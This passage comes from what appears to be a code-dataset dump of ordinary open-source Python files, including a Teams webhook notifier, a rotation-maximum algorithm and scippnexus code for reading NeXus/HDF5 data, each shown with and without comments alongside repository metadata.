                webhook_url,
                http_proxy=os.environ.get("HTTP_PROXY"),
                https_proxy=https_proxy,
            )
        else:
            card = pymsteams.connectorcard(webhook_url)

        if title is not None:
            card.title(title)

        color = os.environ.get("MESSAGE_COLOR")
        if color is not None:
            card.color(color)

        card.text(message)
        card.send()
| <filename>src/TeamsNotifier.py<gh_stars>0
import os
import sys
import pymsteams
class TeamsNotifier:
def notification_type(self):
return "Teams"
def send(self, title, message):
if os.environ.get("WEBHOOK_URL") is None:
print("WEBHOOK_URL environment variable is not set")
sys.exit(1)
if os.environ.get("HTTPS_PROXY") is not None:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"), http_proxy=os.environ.get("HTTP_PROXY"), https_proxy=os.environ.get("HTTPS_PROXY"))
else:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"))
if title is not None:
myTeamsMessage.title(title)
if os.environ.get("MESSAGE_COLOR") is not None:
myTeamsMessage.color(os.environ.get("MESSAGE_COLOR"))
myTeamsMessage.text(message)
myTeamsMessage.send()
| none | 1 | 2.538694 | 3 | |
ezbeq/apis/__init__.py | bmiller/ezbeq | 6 | 6623854 | <filename>ezbeq/apis/__init__.py
import logging

# Package-level logger for ezbeq.apis.
logger = logging.getLogger('ezbeq.apis')
| <filename>ezbeq/apis/__init__.py
import logging
logger = logging.getLogger('ezbeq.apis')
| none | 1 | 1.230872 | 1 | |
src/zodbbrowser/__main__.py | mgedmin/zodbbrowser | 15 | 6623855 |
if __name__ == '__main__':
    # support python -m zodbbrowser on Python 2.7 (which requires the
    # __main__ module to perform the actual entry-point dispatch)
    from zodbbrowser.standalone import main
    main()
|
if __name__ == '__main__':
# support python -m zodbbrowser on Python 2.7
from zodbbrowser.standalone import main
main()
| en | 0.427643 | # support python -m zodbbrowser on Python 2.7 | 1.12848 | 1 |
O(n) on array/rotate_max.py | boristown/leetcode | 1 | 6623856 | def rotate_max_F(L):
    '''
    Compute the maximum value of F over all right rotations k
    (0 <= k <= n-1) of the sequence L, where
    F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1]
    Time complexity: O(n)
    '''
    # Analysis:
    # F(0) = 0 * L[0]     + 1 * L[1]     + ... + (n - 1) * L[n - 1]
    # F(1) = 0 * L[n - 1] + 1 * L[0]     + ... + (n - 1) * L[n - 2]
    # F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) * L[n - 3]
    # Differences:
    # F(1) - F(0) = L[0] + L[1] + ... + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n
    # F(2) - F(1) = L[0] + L[1] + ... + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n
    # F(3) - F(2) = sum(L) - L[n-3]*n
    # F(k) - F(k-1) = sum(L) - L[n-k]*n
    # Steps:
    # 1. Compute n.
    n = len(L)
    # 2. Compute sum(L) once; it is reused for every difference below.
    sumL = sum(L)
    # 3. Compute F(0) directly.
    f = 0
    for i in range(n):
        f += L[i]*i
    # 4. Compute F(1)..F(n-1) incrementally and track the maximum.
    ans = f
    for k in range(1,n):
        f += sumL - L[n-k]*n
        ans = max(ans,f)
    # 5. Return the maximum.
return ans | def rotate_max_F(L):
'''
计算将序列L向右旋转k(0<=k<n-1)后,函数F的最大值
F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1]
时间复杂度:O(n)
'''
#分析:
#F(0) = 0 * L[0] + 1 * L[1] + ... + (n - 1) * L[n - 1]
#F(1) = 0 * L[n - 1] + 1 * L[0] + ... + (n - 1) + L[n - 2]
#F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) + L[n - 3]
#做差:
#F(1) - F(0) = L[0] + L[1] + …… + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n
#F(2) - F(1) = L[0] + L[1] + …… + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n
#F(3) - F(2) = sum(L) - L[n-3]*n
#F(k) - F(k-1) = sum(L) - L[n-k]*n
#过程:
#1 计算n
n = len(L)
#2 计算sum(L)
sumL = sum(L)
#3 计算F(0)
f = 0
for i in range(n):
f += L[i]*i
#4 计算F(1)到F(n-1)并统计最大值
ans = f
for k in range(1,n):
f += sumL - L[n-k]*n
ans = max(ans,f)
#5 输出最大值
return ans | zh | 0.15262 | 计算将序列L向右旋转k(0<=k<n-1)后,函数F的最大值 F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1] 时间复杂度:O(n) #分析: #F(0) = 0 * L[0] + 1 * L[1] + ... + (n - 1) * L[n - 1] #F(1) = 0 * L[n - 1] + 1 * L[0] + ... + (n - 1) + L[n - 2] #F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) + L[n - 3] #做差: #F(1) - F(0) = L[0] + L[1] + …… + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n #F(2) - F(1) = L[0] + L[1] + …… + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n #F(3) - F(2) = sum(L) - L[n-3]*n #F(k) - F(k-1) = sum(L) - L[n-k]*n #过程: #1 计算n #2 计算sum(L) #3 计算F(0) #4 计算F(1)到F(n-1)并统计最大值 #5 输出最大值 | 3.033004 | 3 |
torchrs/datasets/__init__.py | isaaccorley/torchrs | 146 | 6623857 | <filename>torchrs/datasets/__init__.py<gh_stars>100-1000
from . import utils
from .probav import PROBAV
from .etci2021 import ETCI2021
from .rsvqa import RSVQALR, RSVQAHR, RSVQAxBEN
from .eurosat import EuroSATRGB, EuroSATMS
from .resisc45 import RESISC45
from .rsicd import RSICD
from .oscd import OSCD
from .s2looking import S2Looking
from .levircd import LEVIRCDPlus
from .fair1m import FAIR1M
from .sydney_captions import SydneyCaptions
from .ucm_captions import UCMCaptions
from .s2mtcp import S2MTCP
from .advance import ADVANCE
from .sat import SAT4, SAT6
from .hrscd import HRSCD
from .inria_ail import InriaAIL
from .tiselac import Tiselac
from .gid15 import GID15
from .zuericrop import ZueriCrop
from .aid import AID
from .dubai_segmentation import DubaiSegmentation
from .hkh_glacier import HKHGlacierMapping
from .ucm import UCM
from .patternnet import PatternNet
from .whu_rs19 import WHURS19
from .rsscn7 import RSSCN7
from .brazilian_coffee import BrazilianCoffeeScenes
__all__ = [
"PROBAV", "ETCI2021", "RSVQALR", "RSVQAxBEN", "EuroSATRGB", "EuroSATMS",
"RESISC45", "RSICD", "OSCD", "S2Looking", "LEVIRCDPlus", "FAIR1M",
"SydneyCaptions", "UCMCaptions", "S2MTCP", "ADVANCE", "SAT4", "SAT6",
"HRSCD", "InriaAIL", "Tiselac", "GID15", "ZueriCrop", "AID", "DubaiSegmentation",
"HKHGlacierMapping", "UCM", "PatternNet", "RSVQAHR", "WHURS19", "RSSCN7",
"BrazilianCoffeeScenes"
]
| <filename>torchrs/datasets/__init__.py<gh_stars>100-1000
from . import utils
from .probav import PROBAV
from .etci2021 import ETCI2021
from .rsvqa import RSVQALR, RSVQAHR, RSVQAxBEN
from .eurosat import EuroSATRGB, EuroSATMS
from .resisc45 import RESISC45
from .rsicd import RSICD
from .oscd import OSCD
from .s2looking import S2Looking
from .levircd import LEVIRCDPlus
from .fair1m import FAIR1M
from .sydney_captions import SydneyCaptions
from .ucm_captions import UCMCaptions
from .s2mtcp import S2MTCP
from .advance import ADVANCE
from .sat import SAT4, SAT6
from .hrscd import HRSCD
from .inria_ail import InriaAIL
from .tiselac import Tiselac
from .gid15 import GID15
from .zuericrop import ZueriCrop
from .aid import AID
from .dubai_segmentation import DubaiSegmentation
from .hkh_glacier import HKHGlacierMapping
from .ucm import UCM
from .patternnet import PatternNet
from .whu_rs19 import WHURS19
from .rsscn7 import RSSCN7
from .brazilian_coffee import BrazilianCoffeeScenes
__all__ = [
"PROBAV", "ETCI2021", "RSVQALR", "RSVQAxBEN", "EuroSATRGB", "EuroSATMS",
"RESISC45", "RSICD", "OSCD", "S2Looking", "LEVIRCDPlus", "FAIR1M",
"SydneyCaptions", "UCMCaptions", "S2MTCP", "ADVANCE", "SAT4", "SAT6",
"HRSCD", "InriaAIL", "Tiselac", "GID15", "ZueriCrop", "AID", "DubaiSegmentation",
"HKHGlacierMapping", "UCM", "PatternNet", "RSVQAHR", "WHURS19", "RSSCN7",
"BrazilianCoffeeScenes"
]
| none | 1 | 1.243535 | 1 | |
src/scippnexus/nxobject.py | scipp/scippnexus | 0 | 6623858 | # SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from __future__ import annotations
import re
import warnings
import datetime
import dateutil.parser
from enum import Enum, auto
import functools
from typing import List, Union, Any, Dict, Tuple, Protocol
import numpy as np
import scipp as sc
import h5py
from ._hdf5_nexus import _cset_to_encoding, _ensure_str
from ._hdf5_nexus import _ensure_supported_int_type, _warn_latin1_decode
from .typing import H5Group, H5Dataset, ScippIndex
from ._common import to_plain_index
from ._common import convert_time_to_datetime64
NXobjectIndex = Union[str, ScippIndex]
# TODO move into scipp
class DimensionedArray(Protocol):
"""
A multi-dimensional array with a unit and dimension labels.
Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array.
"""
@property
def values(self):
"""Multi-dimensional array of values"""
@property
def unit(self):
"""Physical unit of the values"""
@property
def dims(self) -> List[str]:
"""Dimension labels for the values"""
class AttributeManager(Protocol):
def __getitem__(self, name: str):
"""Get attribute"""
class NexusStructureError(Exception):
"""Invalid or unsupported class and field structure in Nexus.
"""
pass
class NX_class(Enum):
NXdata = auto()
NXdetector = auto()
NXdisk_chopper = auto()
NXentry = auto()
NXevent_data = auto()
NXinstrument = auto()
NXlog = auto()
NXmonitor = auto()
NXroot = auto()
NXsample = auto()
NXsource = auto()
NXtransformations = auto()
class Attrs:
"""HDF5 attributes.
"""
def __init__(self, attrs: AttributeManager):
self._attrs = attrs
def __contains__(self, name: str) -> bool:
return name in self._attrs
def __getitem__(self, name: str) -> Any:
attr = self._attrs[name]
# Is this check for string attributes sufficient? Is there a better way?
if isinstance(attr, (str, bytes)):
cset = self._attrs.get_id(name.encode("utf-8")).get_type().get_cset()
return _ensure_str(attr, _cset_to_encoding(cset))
return attr
def __setitem__(self, name: str, val: Any):
self._attrs[name] = val
def __iter__(self):
yield from self._attrs
def get(self, name: str, default=None) -> Any:
return self[name] if name in self else default
def keys(self):
return self._attrs.keys()
def _is_time(obj):
dummy = sc.empty(dims=[], shape=[], unit=obj.unit)
try:
dummy.to(unit='s')
return True
except sc.UnitError:
return False
def _as_datetime(obj: Any):
if isinstance(obj, str):
try:
# NumPy and scipp cannot handle timezone information. We therefore apply it,
# i.e., convert to UTC.
# Would like to use dateutil directly, but with Python's datetime we do not
# get nanosecond precision. Therefore we combine numpy and dateutil parsing.
date_only = 'T' not in obj
if date_only:
return sc.datetime(obj)
date, time = obj.split('T')
time_and_timezone_offset = re.split(r'Z|\+|-', time)
time = time_and_timezone_offset[0]
if len(time_and_timezone_offset) == 1:
# No timezone, parse directly (scipp based on numpy)
return sc.datetime(f'{date}T{time}')
else:
# There is timezone info. Parse with dateutil.
dt = dateutil.parser.isoparse(obj)
dt = dt.replace(microsecond=0) # handled by numpy
dt = dt.astimezone(datetime.timezone.utc)
dt = dt.replace(tzinfo=None).isoformat()
# We operate with string operations here and thus end up parsing date
# and time twice. The reason is that the timezone-offset arithmetic
# cannot be done, e.g., in nanoseconds without causing rounding errors.
if '.' in time:
dt += f".{time.split('.')[1]}"
return sc.datetime(dt)
except ValueError:
pass
return None
class Field:
"""NeXus field.
In HDF5 fields are represented as dataset.
"""
def __init__(self, dataset: H5Dataset, dims=None, is_time=None):
self._dataset = dataset
self._shape = list(self._dataset.shape)
self._is_time = is_time
# NeXus treats [] and [1] interchangeably. In general this is ill-defined, but
# the best we can do appears to be squeezing unless the file provides names for
# dimensions. The shape property of this class does thus not necessarily return
# the same as the shape of the underlying dataset.
if dims is not None:
self._dims = dims
if len(self._dims) < len(self._shape):
# The convention here is that the given dimensions apply to the shapes
# starting from the left. So we only squeeze dimensions that are after
# len(dims).
self._shape = self._shape[:len(self._dims)] + [
size for size in self._shape[len(self._dims):] if size != 1
]
elif (axes := self.attrs.get('axes')) is not None:
self._dims = axes.split(',')
else:
self._shape = [size for size in self._shape if size != 1]
self._dims = [f'dim_{i}' for i in range(self.ndim)]
def __getitem__(self, select) -> sc.Variable:
index = to_plain_index(self.dims, select)
if isinstance(index, (int, slice)):
index = (index, )
base_dims = self.dims
base_shape = self.shape
dims = []
shape = []
for i, ind in enumerate(index):
if not isinstance(ind, int):
dims.append(base_dims[i])
shape.append(len(range(*ind.indices(base_shape[i]))))
variable = sc.empty(dims=dims, shape=shape, dtype=self.dtype, unit=self.unit)
# If the variable is empty, return early
if np.prod(shape) == 0:
return variable
if self.dtype == sc.DType.string:
try:
strings = self._dataset.asstr()[index]
except UnicodeDecodeError as e:
strings = self._dataset.asstr(encoding='latin-1')[index]
_warn_latin1_decode(self._dataset, strings, str(e))
variable.values = np.asarray(strings).flatten()
elif variable.values.flags["C_CONTIGUOUS"]:
# On versions of h5py prior to 3.2, a TypeError occurs in some cases
# where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer
# of shape (20,). Note that broadcasting (1, 20) -> (20,) does work
# (see https://github.com/h5py/h5py/pull/1796).
# Therefore, we manually squeeze here.
# A pin of h5py<3.2 is currently required by Mantid and hence scippneutron
# (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154)
# hence this workaround. Once we can use a more recent h5py with Mantid,
# this try/except can be removed.
try:
self._dataset.read_direct(variable.values, source_sel=index)
except TypeError:
variable.values = self._dataset[index].squeeze()
else:
variable.values = self._dataset[index]
if _is_time(variable):
starts = []
for name in self.attrs:
if (dt := _as_datetime(self.attrs[name])) is not None:
starts.append(dt)
if self._is_time and len(starts) == 0:
starts.append(sc.epoch(unit=self.unit))
if len(starts) == 1:
variable = convert_time_to_datetime64(
variable,
start=starts[0],
scaling_factor=self.attrs.get('scaling_factor'))
return variable
def __repr__(self) -> str:
return f'<Nexus field "{self._dataset.name}">'
@property
def attrs(self) -> Attrs:
return Attrs(self._dataset.attrs)
@property
def dtype(self) -> str:
dtype = self._dataset.dtype
if str(dtype).startswith('str') or h5py.check_string_dtype(dtype):
dtype = sc.DType.string
else:
dtype = sc.DType(_ensure_supported_int_type(str(dtype)))
return dtype
@property
def name(self) -> str:
return self._dataset.name
@property
def file(self) -> NXroot:
return NXroot(self._dataset.file)
@property
def parent(self) -> NXobject:
return _make(self._dataset.parent)
@property
def ndim(self) -> int:
"""Total number of dimensions in the dataset.
See the shape property for potential differences to the value returned by the
underlying h5py.Dataset.ndim.
"""
return len(self.shape)
@property
def shape(self) -> List[int]:
"""Shape of the field.
NeXus may use extra dimensions of length one to store data, such as shape=[1]
instead of shape=[]. This property returns the *squeezed* shape, dropping all
length-1 dimensions that are not explicitly named. The returned shape may thus
be different from the shape of the underlying h5py.Dataset.
"""
return self._shape
@property
def dims(self) -> List[str]:
return self._dims
@property
def unit(self) -> Union[sc.Unit, None]:
if (unit := self.attrs.get('units')) is not None:
try:
return sc.Unit(unit)
except sc.UnitError:
warnings.warn(f"Unrecognized unit '{unit}' for value dataset "
f"in '{self.name}'; setting unit as 'dimensionless'")
return sc.units.one
return None
class NXobject:
"""Base class for all NeXus groups.
"""
def __init__(self, group: H5Group):
self._group = group
self.child_params = {}
def _get_child(
self,
name: NXobjectIndex,
use_field_dims: bool = False) -> Union['NXobject', Field, sc.DataArray]:
"""Get item, with flag to control whether fields dims should be inferred"""
if name is None:
raise KeyError("None is not a valid index")
if isinstance(name, str):
item = self._group[name]
if hasattr(item, 'shape'):
dims = self._get_field_dims(name) if use_field_dims else None
return Field(item, dims=dims, **self.child_params.get(name, {}))
else:
return _make(item)
da = self._getitem(name)
if (t := self.depends_on) is not None:
da.coords['depends_on'] = t if isinstance(t, sc.Variable) else sc.scalar(t)
return da
def __getitem__(
self,
name: NXobjectIndex) -> Union['NXobject', Field, sc.DataArray, sc.Dataset]:
return self._get_child(name, use_field_dims=True)
def _getitem(self, index: ScippIndex) -> Union[sc.DataArray, sc.Dataset]:
raise NotImplementedError(f'Loading {self.nx_class} is not supported.')
def _get_field_dims(self, name: str) -> Union[None, List[str]]:
"""Subclasses should reimplement this to provide dimension labels for fields."""
return None
def __contains__(self, name: str) -> bool:
return name in self._group
def get(self, name: str, default=None) -> Union['NXobject', Field, sc.DataArray]:
return self[name] if name in self else default
@property
def attrs(self) -> Attrs:
return Attrs(self._group.attrs)
@property
def name(self) -> str:
return self._group.name
@property
def file(self) -> NXroot:
return NXroot(self._group.file)
@property
def parent(self) -> NXobject:
return _make(self._group.parent)
def _ipython_key_completions_(self) -> List[str]:
return list(self.keys())
def keys(self) -> List[str]:
return self._group.keys()
def values(self) -> List[Union[Field, 'NXobject']]:
return [self[name] for name in self.keys()]
def items(self) -> List[Tuple[str, Union[Field, 'NXobject']]]:
return list(zip(self.keys(), self.values()))
@functools.lru_cache()
def by_nx_class(self) -> Dict[NX_class, Dict[str, 'NXobject']]:
classes = {name: [] for name in _nx_class_registry()}
# TODO implement visititems for NXobject and merge the two blocks
def _match_nx_class(_, node):
if not hasattr(node, 'shape'):
if (nx_class := node.attrs.get('NX_class')) is not None:
if not isinstance(nx_class, str):
nx_class = nx_class.decode('UTF-8')
if nx_class in _nx_class_registry():
classes[nx_class].append(node)
self._group.visititems(_match_nx_class)
out = {}
for nx_class, groups in classes.items():
names = [group.name.split('/')[-1] for group in groups]
if len(names) != len(set(names)): # fall back to full path if duplicate
names = [group.name for group in groups]
out[NX_class[nx_class]] = {n: _make(g) for n, g in zip(names, groups)}
return out
@property
def nx_class(self) -> NX_class:
"""The value of the NX_class attribute of the group.
In case of the subclass NXroot this returns 'NXroot' even if the attribute
is not actually set. This is to support the majority of all legacy files, which
do not have this attribute.
"""
return NX_class[self.attrs['NX_class']]
@property
def depends_on(self) -> Union[sc.Variable, sc.DataArray, None]:
if (depends_on := self.get('depends_on')) is not None:
# Imported late to avoid cyclic import
from .nxtransformations import get_full_transformation
return get_full_transformation(depends_on)
return None
def __repr__(self) -> str:
return f'<{type(self).__name__} "{self._group.name}">'
def create_field(self, name: str, data: DimensionedArray, **kwargs) -> Field:
values = data.values
if data.dtype == sc.DType.string:
values = np.array(data.values, dtype=object)
elif data.dtype == sc.DType.datetime64:
start = sc.epoch(unit=data.unit)
values = (data - start).values
dataset = self._group.create_dataset(name, data=values, **kwargs)
if data.unit is not None:
dataset.attrs['units'] = str(data.unit)
if data.dtype == sc.DType.datetime64:
dataset.attrs['start'] = str(start.value)
return Field(dataset, data.dims)
def create_class(self, name: str, nx_class: NX_class) -> NXobject:
group = self._group.create_group(name)
group.attrs['NX_class'] = nx_class.name
return _make(group)
def __setitem__(self, name: str, value: Union[Field, NXobject, DimensionedArray]):
"""Create a link or a new field."""
if isinstance(value, Field):
self._group[name] = value._dataset
elif isinstance(value, NXobject):
self._group[name] = value._group
else:
self.create_field(name, value)
class NXroot(NXobject):
"""Root of a NeXus file."""
@property
def nx_class(self) -> NX_class:
# As an oversight in the NeXus standard and the reference implementation,
# the NX_class was never set to NXroot. This applies to essentially all
# files in existence before 2016, and files written by other implementations
# that were inspired by the reference implementation. We thus hardcode NXroot:
return NX_class['NXroot']
class NXentry(NXobject):
"""Entry in a NeXus file."""
class NXinstrument(NXobject):
"""Group of instrument-related information."""
class NXtransformations(NXobject):
"""Group of transformations."""
def _make(group) -> NXobject:
if (nx_class := Attrs(group.attrs).get('NX_class')) is not None:
return _nx_class_registry().get(nx_class, NXobject)(group)
return group # Return underlying (h5py) group
@functools.lru_cache()
def _nx_class_registry():
from .nxevent_data import NXevent_data
from .nxdata import NXdata
from .nxdetector import NXdetector
from .nxdisk_chopper import NXdisk_chopper
from .nxlog import NXlog
from .nxmonitor import NXmonitor
from .nxsample import NXsample
from .nxsource import NXsource
return {
cls.__name__: cls
for cls in [
NXroot, NXentry, NXevent_data, NXlog, NXmonitor, NXdata, NXdetector,
NXsample, NXsource, NXdisk_chopper, NXinstrument, NXtransformations
]
}
| # SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from __future__ import annotations
import re
import warnings
import datetime
import dateutil.parser
from enum import Enum, auto
import functools
from typing import List, Union, Any, Dict, Tuple, Protocol
import numpy as np
import scipp as sc
import h5py
from ._hdf5_nexus import _cset_to_encoding, _ensure_str
from ._hdf5_nexus import _ensure_supported_int_type, _warn_latin1_decode
from .typing import H5Group, H5Dataset, ScippIndex
from ._common import to_plain_index
from ._common import convert_time_to_datetime64
NXobjectIndex = Union[str, ScippIndex]
# TODO move into scipp
class DimensionedArray(Protocol):
"""
A multi-dimensional array with a unit and dimension labels.
Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array.
"""
@property
def values(self):
"""Multi-dimensional array of values"""
@property
def unit(self):
"""Physical unit of the values"""
@property
def dims(self) -> List[str]:
"""Dimension labels for the values"""
class AttributeManager(Protocol):
def __getitem__(self, name: str):
"""Get attribute"""
class NexusStructureError(Exception):
"""Invalid or unsupported class and field structure in Nexus.
"""
pass
class NX_class(Enum):
NXdata = auto()
NXdetector = auto()
NXdisk_chopper = auto()
NXentry = auto()
NXevent_data = auto()
NXinstrument = auto()
NXlog = auto()
NXmonitor = auto()
NXroot = auto()
NXsample = auto()
NXsource = auto()
NXtransformations = auto()
class Attrs:
"""HDF5 attributes.
"""
def __init__(self, attrs: AttributeManager):
self._attrs = attrs
def __contains__(self, name: str) -> bool:
return name in self._attrs
def __getitem__(self, name: str) -> Any:
attr = self._attrs[name]
# Is this check for string attributes sufficient? Is there a better way?
if isinstance(attr, (str, bytes)):
cset = self._attrs.get_id(name.encode("utf-8")).get_type().get_cset()
return _ensure_str(attr, _cset_to_encoding(cset))
return attr
def __setitem__(self, name: str, val: Any):
self._attrs[name] = val
def __iter__(self):
yield from self._attrs
def get(self, name: str, default=None) -> Any:
return self[name] if name in self else default
def keys(self):
return self._attrs.keys()
def _is_time(obj):
dummy = sc.empty(dims=[], shape=[], unit=obj.unit)
try:
dummy.to(unit='s')
return True
except sc.UnitError:
return False
def _as_datetime(obj: Any):
if isinstance(obj, str):
try:
# NumPy and scipp cannot handle timezone information. We therefore apply it,
# i.e., convert to UTC.
# Would like to use dateutil directly, but with Python's datetime we do not
# get nanosecond precision. Therefore we combine numpy and dateutil parsing.
date_only = 'T' not in obj
if date_only:
return sc.datetime(obj)
date, time = obj.split('T')
time_and_timezone_offset = re.split(r'Z|\+|-', time)
time = time_and_timezone_offset[0]
if len(time_and_timezone_offset) == 1:
# No timezone, parse directly (scipp based on numpy)
return sc.datetime(f'{date}T{time}')
else:
# There is timezone info. Parse with dateutil.
dt = dateutil.parser.isoparse(obj)
dt = dt.replace(microsecond=0) # handled by numpy
dt = dt.astimezone(datetime.timezone.utc)
dt = dt.replace(tzinfo=None).isoformat()
# We operate with string operations here and thus end up parsing date
# and time twice. The reason is that the timezone-offset arithmetic
# cannot be done, e.g., in nanoseconds without causing rounding errors.
if '.' in time:
dt += f".{time.split('.')[1]}"
return sc.datetime(dt)
except ValueError:
pass
return None
class Field:
"""NeXus field.
In HDF5 fields are represented as dataset.
"""
def __init__(self, dataset: H5Dataset, dims=None, is_time=None):
self._dataset = dataset
self._shape = list(self._dataset.shape)
self._is_time = is_time
# NeXus treats [] and [1] interchangeably. In general this is ill-defined, but
# the best we can do appears to be squeezing unless the file provides names for
# dimensions. The shape property of this class does thus not necessarily return
# the same as the shape of the underlying dataset.
if dims is not None:
self._dims = dims
if len(self._dims) < len(self._shape):
# The convention here is that the given dimensions apply to the shapes
# starting from the left. So we only squeeze dimensions that are after
# len(dims).
self._shape = self._shape[:len(self._dims)] + [
size for size in self._shape[len(self._dims):] if size != 1
]
elif (axes := self.attrs.get('axes')) is not None:
self._dims = axes.split(',')
else:
self._shape = [size for size in self._shape if size != 1]
self._dims = [f'dim_{i}' for i in range(self.ndim)]
def __getitem__(self, select) -> sc.Variable:
index = to_plain_index(self.dims, select)
if isinstance(index, (int, slice)):
index = (index, )
base_dims = self.dims
base_shape = self.shape
dims = []
shape = []
for i, ind in enumerate(index):
if not isinstance(ind, int):
dims.append(base_dims[i])
shape.append(len(range(*ind.indices(base_shape[i]))))
variable = sc.empty(dims=dims, shape=shape, dtype=self.dtype, unit=self.unit)
# If the variable is empty, return early
if np.prod(shape) == 0:
return variable
if self.dtype == sc.DType.string:
try:
strings = self._dataset.asstr()[index]
except UnicodeDecodeError as e:
strings = self._dataset.asstr(encoding='latin-1')[index]
_warn_latin1_decode(self._dataset, strings, str(e))
variable.values = np.asarray(strings).flatten()
elif variable.values.flags["C_CONTIGUOUS"]:
# On versions of h5py prior to 3.2, a TypeError occurs in some cases
# where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer
# of shape (20,). Note that broadcasting (1, 20) -> (20,) does work
# (see https://github.com/h5py/h5py/pull/1796).
# Therefore, we manually squeeze here.
# A pin of h5py<3.2 is currently required by Mantid and hence scippneutron
# (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154)
# hence this workaround. Once we can use a more recent h5py with Mantid,
# this try/except can be removed.
try:
self._dataset.read_direct(variable.values, source_sel=index)
except TypeError:
variable.values = self._dataset[index].squeeze()
else:
variable.values = self._dataset[index]
if _is_time(variable):
starts = []
for name in self.attrs:
if (dt := _as_datetime(self.attrs[name])) is not None:
starts.append(dt)
if self._is_time and len(starts) == 0:
starts.append(sc.epoch(unit=self.unit))
if len(starts) == 1:
variable = convert_time_to_datetime64(
variable,
start=starts[0],
scaling_factor=self.attrs.get('scaling_factor'))
return variable
def __repr__(self) -> str:
return f'<Nexus field "{self._dataset.name}">'
@property
def attrs(self) -> Attrs:
return Attrs(self._dataset.attrs)
@property
def dtype(self) -> str:
dtype = self._dataset.dtype
if str(dtype).startswith('str') or h5py.check_string_dtype(dtype):
dtype = sc.DType.string
else:
dtype = sc.DType(_ensure_supported_int_type(str(dtype)))
return dtype
@property
def name(self) -> str:
return self._dataset.name
@property
def file(self) -> NXroot:
return NXroot(self._dataset.file)
@property
def parent(self) -> NXobject:
return _make(self._dataset.parent)
@property
def ndim(self) -> int:
"""Total number of dimensions in the dataset.
See the shape property for potential differences to the value returned by the
underlying h5py.Dataset.ndim.
"""
return len(self.shape)
@property
def shape(self) -> List[int]:
"""Shape of the field.
NeXus may use extra dimensions of length one to store data, such as shape=[1]
instead of shape=[]. This property returns the *squeezed* shape, dropping all
length-1 dimensions that are not explicitly named. The returned shape may thus
be different from the shape of the underlying h5py.Dataset.
"""
return self._shape
@property
def dims(self) -> List[str]:
return self._dims
@property
def unit(self) -> Union[sc.Unit, None]:
if (unit := self.attrs.get('units')) is not None:
try:
return sc.Unit(unit)
except sc.UnitError:
warnings.warn(f"Unrecognized unit '{unit}' for value dataset "
f"in '{self.name}'; setting unit as 'dimensionless'")
return sc.units.one
return None
class NXobject:
"""Base class for all NeXus groups.
"""
def __init__(self, group: H5Group):
self._group = group
self.child_params = {}
def _get_child(
self,
name: NXobjectIndex,
use_field_dims: bool = False) -> Union['NXobject', Field, sc.DataArray]:
"""Get item, with flag to control whether fields dims should be inferred"""
if name is None:
raise KeyError("None is not a valid index")
if isinstance(name, str):
item = self._group[name]
if hasattr(item, 'shape'):
dims = self._get_field_dims(name) if use_field_dims else None
return Field(item, dims=dims, **self.child_params.get(name, {}))
else:
return _make(item)
da = self._getitem(name)
if (t := self.depends_on) is not None:
da.coords['depends_on'] = t if isinstance(t, sc.Variable) else sc.scalar(t)
return da
def __getitem__(
self,
name: NXobjectIndex) -> Union['NXobject', Field, sc.DataArray, sc.Dataset]:
return self._get_child(name, use_field_dims=True)
def _getitem(self, index: ScippIndex) -> Union[sc.DataArray, sc.Dataset]:
raise NotImplementedError(f'Loading {self.nx_class} is not supported.')
def _get_field_dims(self, name: str) -> Union[None, List[str]]:
"""Subclasses should reimplement this to provide dimension labels for fields."""
return None
def __contains__(self, name: str) -> bool:
return name in self._group
def get(self, name: str, default=None) -> Union['NXobject', Field, sc.DataArray]:
return self[name] if name in self else default
@property
def attrs(self) -> Attrs:
return Attrs(self._group.attrs)
@property
def name(self) -> str:
return self._group.name
@property
def file(self) -> NXroot:
return NXroot(self._group.file)
@property
def parent(self) -> NXobject:
return _make(self._group.parent)
def _ipython_key_completions_(self) -> List[str]:
return list(self.keys())
def keys(self) -> List[str]:
return self._group.keys()
def values(self) -> List[Union[Field, 'NXobject']]:
return [self[name] for name in self.keys()]
def items(self) -> List[Tuple[str, Union[Field, 'NXobject']]]:
return list(zip(self.keys(), self.values()))
@functools.lru_cache()
def by_nx_class(self) -> Dict[NX_class, Dict[str, 'NXobject']]:
classes = {name: [] for name in _nx_class_registry()}
# TODO implement visititems for NXobject and merge the two blocks
def _match_nx_class(_, node):
if not hasattr(node, 'shape'):
if (nx_class := node.attrs.get('NX_class')) is not None:
if not isinstance(nx_class, str):
nx_class = nx_class.decode('UTF-8')
if nx_class in _nx_class_registry():
classes[nx_class].append(node)
self._group.visititems(_match_nx_class)
out = {}
for nx_class, groups in classes.items():
names = [group.name.split('/')[-1] for group in groups]
if len(names) != len(set(names)): # fall back to full path if duplicate
names = [group.name for group in groups]
out[NX_class[nx_class]] = {n: _make(g) for n, g in zip(names, groups)}
return out
@property
def nx_class(self) -> NX_class:
"""The value of the NX_class attribute of the group.
In case of the subclass NXroot this returns 'NXroot' even if the attribute
is not actually set. This is to support the majority of all legacy files, which
do not have this attribute.
"""
return NX_class[self.attrs['NX_class']]
@property
